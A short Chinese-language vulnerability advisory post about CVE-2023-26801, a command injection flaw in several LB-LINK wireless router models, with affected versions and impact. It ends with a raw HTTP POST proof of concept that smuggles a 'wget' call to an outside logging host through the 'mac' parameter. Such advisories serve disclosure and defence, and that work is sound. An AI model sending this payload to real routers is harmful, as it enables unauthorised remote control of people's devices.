LB-LINK 远程命令执行 CVE-2023-26801

漏洞信息·网络安全 · 2023-09-29 · 2184 人浏览

原理

LB-LINK BL-AC1900等都是中国必联(LB-LINK)公司的一款无线路由器。该漏洞源于通过/goform/set_LimitClient_cfg中的mac、time1和time2参数发现包含命令注入漏洞。

影响范围

LB-LINK BL-AC1900_2.0 v1.0.1版本、LB-LINK BL-WR9000 v2.4.9版本、LB-LINK BL-X26 v1.2.5版本、LB-LINK BL-LTE300 v1.0.8版本存在安全漏洞。

危害

远程攻击者可利用该漏洞执行任意命令,取得服务器控制权。

POC & EXP

手工

POST /goform/set_LimitClient_cfg HTTP/1.1
Cookie: user=admin

time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://dnslog.cn;
RCE 远程命令注入 路由器 2184 Views
2023 - 2024 Equinox 交界线. All Rights Reserved.
本站已在互联网运行了 Theme Jasmine by Kent Liao